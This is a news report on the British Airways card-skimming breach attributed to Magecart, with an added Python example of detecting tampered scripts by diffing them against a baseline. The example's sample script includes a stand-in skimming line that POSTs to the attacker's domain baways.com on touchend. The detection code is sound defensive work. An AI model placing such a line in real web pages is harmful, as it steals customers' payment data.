The British Airways website had a credit card theft code injected

[Image: Thousands of BA customers have seen their credit card data "skimmed" by malicious JavaScript code inserted into the airline's website. Photo: Alf van Beem]

Last week, British Airways revealed that all payment information processed through the airline's website and mobile application between August 21 and September 5 had been exposed. Some 38,000 British Airways customers may have had their contact and financial information stolen in the breach, suggesting that malicious JavaScript code had been installed on the British Airways website.

According to a report released Tuesday by RiskIQ head researcher Yonathan Klijnsma, RiskIQ detected the use of a script associated with a "threat group" RiskIQ calls Magecart, the same group of actors suspected of being behind a credit card breach at Ticketmaster UK. While the Ticketmaster UK breach resulted from JavaScript injected via a third-party service used by the Ticketmaster website, the British Airways breach was the result of a compromise of BA's own web server, according to RiskIQ's analysis.

"This attack is a very focused approach compared to what we have seen in the past with the Magecart skimmer," Klijnsma said. "This skimmer is aware of the configuration of the British Airways payment page, which tells us that the attackers considered how to target that particular site."

[Image: The 22 lines of code found by RiskIQ researchers buried in the British Airways JavaScript libraries resulted in the theft of thousands of customers' payment data.]

The suspicious scripts were detected through a daily website analysis conducted by RiskIQ, which collects data on more than two billion pages per day. By focusing on how the scripts on the BA site changed over time, RiskIQ researchers found a modified script on BA's website. Code added to a JavaScript library used by the BA site made a call to an API on a malicious web server at baways.com, a vendor-hosted virtual private server in Lithuania, using a TLS certificate registered through Comodo on August 15 (apparently to bolster its appearance of legitimacy).

The 22 lines of code were designed to exfiltrate the data entered on the BA website's payment form to the malicious server when a user clicked the "Submit" button, sending the data as a JSON object. The transaction then went through for the customer without any errors, while the attackers received a complete copy of the customer's payment information, even though the payment was apparently made over a secure session. The attackers also added a "touchend" callback to the script, which made the attack work for users of BA's mobile app, which loaded the same modified script.
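The detection approach RiskIQ describes, comparing a site's served scripts against an earlier copy and inspecting what was added, can be sketched as follows. This is an added example, not RiskIQ's tooling or anything from the BA site: the two script copies, the first-party host www.ba.example and the allow-list are constructed, and only the baways.com hostname comes from the report above.

```python
import difflib
import hashlib
import re
from urllib.parse import urlsplit

# Constructed sample inputs (not the real BA library or the real injected code):
# a baseline copy of a first-party script, and a later copy with lines appended.
BASELINE_JS = """\
var api = "https://www.ba.example/api/status";
function ready(fn) { document.addEventListener("DOMContentLoaded", fn); }
ready(function () { fetch(api); });
"""

MODIFIED_JS = BASELINE_JS + """\
var ping = "https://www.ba.example/ping";
var btn = document.querySelector("#submitButton");
btn.addEventListener("touchend", send);
function send() { fetch("https://baways.com/collect", {method: "POST"}); }
"""

URL_RE = re.compile(r"""https?://[^\s"'()]+""")
LISTENER_RE = re.compile(r"""addEventListener\(\s*["'](\w+)["']""")


def fingerprint(script: str) -> str:
    """SHA-256 of the exact text served; any change to the file changes this."""
    return hashlib.sha256(script.encode()).hexdigest()


def added_lines(baseline: str, current: str) -> list:
    """Lines present in the current copy that were not in the baseline."""
    diff = difflib.unified_diff(baseline.splitlines(), current.splitlines(),
                                lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def audit_script(baseline: str, current: str, allowed_hosts: set) -> dict:
    """Flag a changed script, any new external hosts it talks to, and new event hooks."""
    new = added_lines(baseline, current)
    hosts = {urlsplit(u).hostname for l in new for u in URL_RE.findall(l)}
    events = {e for l in new for e in LISTENER_RE.findall(l)}
    return {
        "changed": fingerprint(baseline) != fingerprint(current),
        "unknown_hosts": sorted(h for h in hosts if h not in allowed_hosts),
        "new_listeners": sorted(events),
    }


if __name__ == "__main__":
    print(audit_script(BASELINE_JS, MODIFIED_JS, {"www.ba.example"}))
```

A real deployment would fetch each script on a schedule and store the fingerprints; the unknown-host and new-listener checks are what turn "the file changed" into something an analyst can triage.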

While the timestamp of the modified script file corresponds to the start of the attack reported by British Airways, the registration date of the malicious site's certificate, according to Klijnsma, "indicates [the attackers] probably had access to the British Airways website before the start date of the attack announced on August 21, probably long before. In the absence of visibility into its web-based web resources, British Airways was unable to detect this compromise until it was too late."

British Airways would not comment on the RiskIQ report, as a criminal investigation is still ongoing.
